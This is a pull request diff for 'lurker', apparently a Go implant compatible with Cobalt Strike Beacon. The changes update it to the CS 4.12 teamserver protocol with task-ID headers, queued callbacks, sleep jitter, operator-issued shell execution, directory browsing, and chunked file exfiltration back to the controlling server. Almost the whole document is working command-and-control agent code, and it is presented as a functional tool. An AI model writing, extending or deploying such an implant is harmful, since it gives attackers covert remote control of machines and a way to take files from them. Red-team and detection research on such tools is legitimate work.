### PR TITLE
Many CS 4.12 compatibilty fixes

### DIFF
--- a/lurker/commands/commands.go
+++ b/lurker/commands/commands.go
@@ -27,6 +27,21 @@ const (
 	CMD_TYPE_FILE_BROWSE  = 53
 )
 
+// Callback type constants (agent → teamserver)
+const (
+	CALLBACK_OUTPUT            = 0
+	CALLBACK_FILE              = 2  // download start
+	CALLBACK_FILE_WRITE        = 8  // download chunk
+	CALLBACK_FILE_CLOSE        = 9  // download complete
+	CALLBACK_PWD               = 19
+	CALLBACK_FILE_BROWSE       = 22
+	CALLBACK_DEAD              = 26 // exit confirmation
+	CALLBACK_ERROR             = 31
+	CALLBACK_OUTPUT_JOBS       = 56 // shell output, CS 4.12
+	CALLBACK_PROCESS_STARTED   = 58 // shell started
+	CALLBACK_PROCESS_COMPLETED = 59 // shell/job completed
+)
+
 func ParseCommandShell(b []byte) (string, []byte) {
 	buf := bytes.NewBuffer(b)
 	pathLenBytes := make([]byte, 4)
@@ -111,23 +126,23 @@ func Upload(filePath string, fileContent []byte) int {
 	}
 	return offset
 }
-func ChangeCurrentDir(path []byte) {
+func ChangeCurrentDir(path []byte, taskID [8]byte) {
 	err := os.Chdir(string(path))
 	if err != nil {
-		processErrorTest(err.Error())
+		ProcessErrorWithTaskID(err.Error(), taskID)
 	}
 }
-func GetCurrentDirectory() []byte {
+func GetCurrentDirectory(taskID [8]byte) []byte {
 	pwd, err := os.Getwd()
 	result, err := filepath.Abs(pwd)
 	if err != nil {
-		processErrorTest(err.Error())
+		ProcessErrorWithTaskID(err.Error(), taskID)
 		return nil
 	}
 	return []byte(result)
 }
 
-func File_Browse(b []byte) []byte {
+func File_Browse(b []byte, taskID [8]byte) []byte {
 	buf := bytes.NewBuffer(b)
 	pendingRequest := make([]byte, 4)
 	dirPathLenBytes := make([]byte, 4)
@@ -171,7 +186,7 @@ func File_Browse(b []byte) []byte {
 	*/
 	fileInfo, err := os.Stat(dirPathStr)
 	if err != nil {
-		processErrorTest(err.Error())
+		ProcessErrorWithTaskID(err.Error(), taskID)
 		return nil
 	}
 	modTime := fileInfo.ModTime()
@@ -203,12 +218,12 @@ func File_Browse(b []byte) []byte {
 	return utilities.BytesCombine(pendingRequest, []byte(resultStr))
 }
 
-func processErrorTest(err string) {
+func ProcessErrorWithTaskID(errStr string, taskID [8]byte) {
 	errIdBytes := transports.WriteInt(0) // must be zero
 	arg1Bytes := transports.WriteInt(0)  // for debug
 	arg2Bytes := transports.WriteInt(0)
-	errMsgBytes := []byte(err)
+	errMsgBytes := []byte(errStr)
 	result := utilities.BytesCombine(errIdBytes, arg1Bytes, arg2Bytes, errMsgBytes)
-	finalPacket := transports.MakePacket(31, result)
-	transports.PushResult(finalPacket)
+	finalPacket := transports.MakePacket(CALLBACK_ERROR, taskID, result)
+	transports.QueueResult(finalPacket)
 }

--- a/lurker/constants/constants.go
+++ b/lurker/constants/constants.go
@@ -23,14 +23,16 @@ J6JqDBl5e3S7KOhvci76QtWfR/TrNyU9tv8Wz8wqe9kovpHNpVzUNJvVUQIDAQAB
 	UseProxy                    = false
 	Proxy                       = "127.0.0.1:8080"
 	SleepTime                   = 10000 * time.Millisecond
+	SleepJitter                 = 0 // jitter percentage (0-100)
 	IgnoreSSLCertErrors         = true
-	TimeOut       time.Duration = 10 //seconds
+	TimeOut time.Duration       = 5 //seconds
 
-	IV        = []byte("abcdefghijklmnop")
+	IV                          = []byte("abcdefghijklmnop")
 	GlobalKey []byte
 	AesKey    []byte
 	HmacKey   []byte
-	Counter   = 0
+	Counter                     = 0
+	NextJobNum                  = 0
 )
 
 const (

--- a/lurker/transports/transports.go
+++ b/lurker/transports/transports.go
@@ -88,57 +88,63 @@ func DetectTaskHeaderLen(taskData []byte, totalLen uint32) int {
 	return 0
 }
 
-func ParsePacket(buf *bytes.Buffer, totalLen *uint32, taskHeaderLen int) (uint32, []byte, error) {
+func ParsePacket(buf *bytes.Buffer, totalLen *uint32, taskHeaderLen int) (uint32, [8]byte, []byte, error) {
+	var taskID [8]byte
+
 	commandTypeBytes := make([]byte, 4)
 	_, err := buf.Read(commandTypeBytes)
 	if err != nil {
-		return 0, nil, fmt.Errorf("reading command type: %w", err)
+		return 0, taskID, nil, fmt.Errorf("reading command type: %w", err)
 	}
 	commandType := binary.BigEndian.Uint32(commandTypeBytes)
 	commandLenBytes := make([]byte, 4)
 	_, err = buf.Read(commandLenBytes)
 	if err != nil {
-		return 0, nil, fmt.Errorf("reading command length: %w", err)
+		return 0, taskID, nil, fmt.Errorf("reading command length: %w", err)
 	}
 	commandLen := ReadInt(commandLenBytes)
 
-	// Skip the per-task header if present (CS 4.12+)
+	// Read per-task header if present (CS 4.12+)
 	if taskHeaderLen > 0 {
 		headerBytes := make([]byte, taskHeaderLen)
 		_, err = buf.Read(headerBytes)
 		if err != nil {
-			return 0, nil, fmt.Errorf("reading task header: %w", err)
+			return 0, taskID, nil, fmt.Errorf("reading task header: %w", err)
 		}
+		copy(taskID[:], headerBytes[:8])
 	}
 
 	commandBuf := make([]byte, commandLen)
 	_, err = buf.Read(commandBuf)
 	if err != nil {
-		return 0, nil, fmt.Errorf("reading command data: %w", err)
+		return 0, taskID, nil, fmt.Errorf("reading command data: %w", err)
 	}
 	*totalLen -= (4 + 4 + uint32(taskHeaderLen) + commandLen)
 
-	return commandType, commandBuf, nil
+	return commandType, taskID, commandBuf, nil
 }
 
-func MakePacket(replyType int, b []byte) []byte {
+func MakePacket(replyType int, taskID [8]byte, b []byte) []byte {
 	constants.Counter += 1
 	buf := new(bytes.Buffer)
 	counterBytes := make([]byte, 4)
 	binary.BigEndian.PutUint32(counterBytes, uint32(constants.Counter))
 	buf.Write(counterBytes)
 
-	if b != nil {
-		resultLenBytes := make([]byte, 4)
-		resultLen := len(b) + 4
-		binary.BigEndian.PutUint32(resultLenBytes, uint32(resultLen))
-		buf.Write(resultLenBytes)
-	}
+	// resultLen = 4 (replyType) + 8 (taskID) + len(data)
+	dataLen := len(b)
+	resultLen := 4 + 8 + dataLen
+	resultLenBytes := make([]byte, 4)
+	binary.BigEndian.PutUint32(resultLenBytes, uint32(resultLen))
+	buf.Write(resultLenBytes)
 
+	// OR the reply type with MSB flag (0x80000000) for CS 4.12
 	replyTypeBytes := make([]byte, 4)
-	binary.BigEndian.PutUint32(replyTypeBytes, uint32(replyType))
+	binary.BigEndian.PutUint32(replyTypeBytes, uint32(replyType)|0x80000000)
 	buf.Write(replyTypeBytes)
 
+	// Prepend task ID before data
+	buf.Write(taskID[:])
 	buf.Write(b)
 
 	encrypted, err := cryptography.AesCBCEncrypt(buf.Bytes(), constants.AesKey)
@@ -159,7 +165,26 @@ func MakePacket(replyType int, b []byte) []byte {
 	buf.Write(hmacHashBytes)
 
 	return buf.Bytes()
+}
 
+var resultQueue [][]byte
+
+func QueueResult(packet []byte) {
+	resultQueue = append(resultQueue, packet)
+}
+
+func FlushResults() {
+	if len(resultQueue) == 0 {
+		return
+	}
+	var combined []byte
+	for _, p := range resultQueue {
+		combined = append(combined, p...)
+	}
+	url := constants.PostUrl
+	id := strconv.Itoa(clientID)
+	HttpPost(url, id, combined)
+	resultQueue = nil
 }
 
 func EncryptedMetaInfo() string {
@@ -289,9 +314,3 @@ func PullCommand() *http.Response {
 	return resp
 }
 
-func PushResult(b []byte) *http.Response {
-	url := constants.PostUrl
-	id := strconv.Itoa(clientID)
-	resp := HttpPost(url, id, b)
-	return resp
-}

--- a/main.go
+++ b/main.go
@@ -4,8 +4,10 @@ import (
 	"bytes"
 	"crypto/hmac"
 	"encoding/base64"
+	"encoding/binary"
 	"fmt"
 	"io"
+	"math/rand"
 	"net/http"
 	"os"
 	"strings"
@@ -18,8 +20,16 @@ import (
 	"lurker/lurker/utilities"
 )
 
-func main() {
+// Stateful download — one chunk per callback cycle
+type pendingDownload struct {
+	file       *os.File
+	reqIDBytes []byte
+	taskID     [8]byte
+}
 
+var activeDownload *pendingDownload
+
+func main() {
 	ok := transports.InitialCallback()
 	if ok {
 		for {
@@ -29,8 +39,44 @@ func main() {
 					fmt.Printf("!error processing response: %v\n", err)
 				}
 			}
-			time.Sleep(constants.SleepTime)
+			serviceDownload()
+			transports.FlushResults()
+			sleepWithJitter()
 		}
+	}
+}
+
+func sleepWithJitter() {
+	base := constants.SleepTime
+	jitter := constants.SleepJitter
+	if jitter <= 0 || base <= 0 {
+		time.Sleep(base)
+		return
+	}
+	minSleep := float64(base) * (1.0 - float64(jitter)/100.0)
+	maxSleep := float64(base)
+	actual := minSleep + rand.Float64()*(maxSleep-minSleep)
+	time.Sleep(time.Duration(actual))
+}
+
+// serviceDownload reads one chunk from an active download and queues it
+func serviceDownload() {
+	dl := activeDownload
+	if dl == nil {
+		return
+	}
+	buf := make([]byte, 512*1024)
+	n, err := dl.file.Read(buf)
+	if n > 0 {
+		chunk := utilities.BytesCombine(dl.reqIDBytes, buf[:n])
+		pkt := transports.MakePacket(commands.CALLBACK_FILE_WRITE, dl.taskID, chunk)
+		transports.QueueResult(pkt)
+	}
+	if err != nil || n == 0 {
+		pkt := transports.MakePacket(commands.CALLBACK_FILE_CLOSE, dl.taskID, dl.reqIDBytes)
+		transports.QueueResult(pkt)
+		dl.file.Close()
+		activeDownload = nil
 	}
 }
 
@@ -80,24 +126,39 @@ func processResponse(resp *http.Response) error {
 		if transportsLen <= 0 {
 			break
 		}
-		cmdType, cmdBuf, err := transports.ParsePacket(decryptedBuf, &transportsLen, taskHeaderLen)
+		cmdType, taskID, cmdBuf, err := transports.ParsePacket(decryptedBuf, &transportsLen, taskHeaderLen)
 		if err != nil {
 			return fmt.Errorf("parsing packet: %w", err)
 		}
 		if cmdBuf != nil {
-			executeCommand(cmdType, cmdBuf)
+			executeCommand(cmdType, taskID, cmdBuf)
 		}
 	}
 	return nil
 }
 
-func executeCommand(cmdType uint32, cmdBuf []byte) {
+func executeCommand(cmdType uint32, taskID [8]byte, cmdBuf []byte) {
 	switch cmdType {
 	case commands.CMD_TYPE_SHELL:
 		shellPath, shellBuf := commands.ParseCommandShell(cmdBuf)
 		result := commands.Shell(shellPath, shellBuf)
-		finalPacket := transports.MakePacket(0, result)
-		transports.PushResult(finalPacket)
+
+		constants.NextJobNum++
+		jobNum := constants.NextJobNum
+		jobNumBytes := make([]byte, 4)
+		binary.BigEndian.PutUint32(jobNumBytes, uint32(jobNum))
+
+		// Type 58 (PROCESS_STARTED): [jobNum:4] + "process\0"
+		startedData := utilities.BytesCombine(jobNumBytes, []byte("process\x00"))
+		transports.QueueResult(transports.MakePacket(commands.CALLBACK_PROCESS_STARTED, taskID, startedData))
+
+		// Type 56 (OUTPUT_JOBS): [jobNum:4][0:4][0:4][output_text]
+		pad := make([]byte, 4)
+		outputData := utilities.BytesCombine(jobNumBytes, pad, pad, result)
+		transports.QueueResult(transports.MakePacket(commands.CALLBACK_OUTPUT_JOBS, taskID, outputData))
+
+		// Type 59 (PROCESS_COMPLETED): [jobNum:4]
+		transports.QueueResult(transports.MakePacket(commands.CALLBACK_PROCESS_COMPLETED, taskID, jobNumBytes))
 
 	case commands.CMD_TYPE_UPLOAD_START:
 		filePath, fileData := commands.ParseCommandUpload(cmdBuf)
@@ -111,63 +172,58 @@ func executeCommand(cmdType uint32, cmdBuf []byte) {
 
 	case commands.CMD_TYPE_DOWNLOAD:
 		filePath := cmdBuf
-		strFilePath := string(filePath)
-		strFilePath = strings.ReplaceAll(strFilePath, "\\", "/")
+		strFilePath := strings.ReplaceAll(string(filePath), "\\", "/")
 		fileInfo, err := os.Stat(strFilePath)
 		if err != nil {
 			return
 		}
-		fileLen := fileInfo.Size()
-		test := int(fileLen)
-		fileLenBytes := transports.WriteInt(test)
+		fileLen := int(fileInfo.Size())
+		fileLenBytes := transports.WriteInt(fileLen)
 		requestID := cryptography.RandomInt(10000, 99999)
 		requestIDBytes := transports.WriteInt(requestID)
-		result := utilities.BytesCombine(requestIDBytes, fileLenBytes, filePath)
-		finalPaket := transports.MakePacket(2, result)
-		transports.PushResult(finalPaket)
 
+		// Queue the download start (type 2)
+		result := utilities.BytesCombine(requestIDBytes, fileLenBytes, filePath)
+		transports.QueueResult(transports.MakePacket(commands.CALLBACK_FILE, taskID, result))
+
+		// Open file and set up stateful download — chunks sent one per cycle
 		fileHandle, err := os.Open(strFilePath)
 		if err != nil {
 			return
 		}
-		defer fileHandle.Close()
-		var fileContent []byte
-		fileBuf := make([]byte, 512*1024)
-		for {
-			n, err := fileHandle.Read(fileBuf)
-			if err != nil && err != io.EOF {
-				break
-			}
-			if n == 0 {
-				break
-			}
-			fileContent = fileBuf[:n]
-			result = utilities.BytesCombine(requestIDBytes, fileContent)
-			finalPaket = transports.MakePacket(8, result)
-			transports.PushResult(finalPaket)
+		activeDownload = &pendingDownload{
+			file:       fileHandle,
+			reqIDBytes: requestIDBytes,
+			taskID:     taskID,
 		}
 
-		finalPaket = transports.MakePacket(9, requestIDBytes)
-		transports.PushResult(finalPaket)
-
 	case commands.CMD_TYPE_FILE_BROWSE:
-		dirResult := commands.File_Browse(cmdBuf)
-		finalPacket := transports.MakePacket(22, dirResult)
-		transports.PushResult(finalPacket)
+		dirResult := commands.File_Browse(cmdBuf, taskID)
+		transports.QueueResult(transports.MakePacket(commands.CALLBACK_FILE_BROWSE, taskID, dirResult))
 
 	case commands.CMD_TYPE_CD:
-		commands.ChangeCurrentDir(cmdBuf)
+		commands.ChangeCurrentDir(cmdBuf, taskID)
 
 	case commands.CMD_TYPE_SLEEP:
-		sleep := transports.ReadInt(cmdBuf[:4])
-		constants.SleepTime = time.Duration(sleep) * time.Millisecond
+		if len(cmdBuf) >= 8 {
+			sleep := transports.ReadInt(cmdBuf[:4])
+			jitter := transports.ReadInt(cmdBuf[4:8])
+			constants.SleepTime = time.Duration(sleep) * time.Millisecond
+			constants.SleepJitter = int(jitter)
+		} else if len(cmdBuf) >= 4 {
+			sleep := transports.ReadInt(cmdBuf[:4])
+			constants.SleepTime = time.Duration(sleep) * time.Millisecond
+			constants.SleepJitter = 0
+		}
 
 	case commands.CMD_TYPE_PWD:
-		pwdResult := commands.GetCurrentDirectory()
-		finPacket := transports.MakePacket(19, pwdResult)
-		transports.PushResult(finPacket)
+		pwdResult := commands.GetCurrentDirectory(taskID)
+		transports.QueueResult(transports.MakePacket(commands.CALLBACK_PWD, taskID, pwdResult))
 
 	case commands.CMD_TYPE_EXIT:
+		// Queue exit callback, flush immediately, then die
+		transports.QueueResult(transports.MakePacket(commands.CALLBACK_DEAD, taskID, nil))
+		transports.FlushResults()
 		os.Exit(0)
 
 	default:
@@ -176,7 +232,6 @@ func executeCommand(cmdType uint32, cmdBuf []byte) {
 		arg2Bytes := transports.WriteInt(0)
 		errMsgBytes := []byte("")
 		result := utilities.BytesCombine(errIdBytes, arg1Bytes, arg2Bytes, errMsgBytes)
-		finalPacket := transports.MakePacket(31, result)
-		transports.PushResult(finalPacket)
+		transports.QueueResult(transports.MakePacket(commands.CALLBACK_ERROR, taskID, result))
 	}
 }


### PR DESCRIPTION
- Added proper jitter functionality and message parsing
- Added proper per-task job id tracking to pair operator commands with associated input in logs
- shell now properly sends all the appropriate messages
- exit now sends appropriate new message type back to the teamserver
- Made upload command properly chunk like real Cobalt Strike Beacon (2MB chunks to agent via GET)
- Made download command properly chunk like real Cobalt Strike Beacon (512KB chunks to teamserver via POST)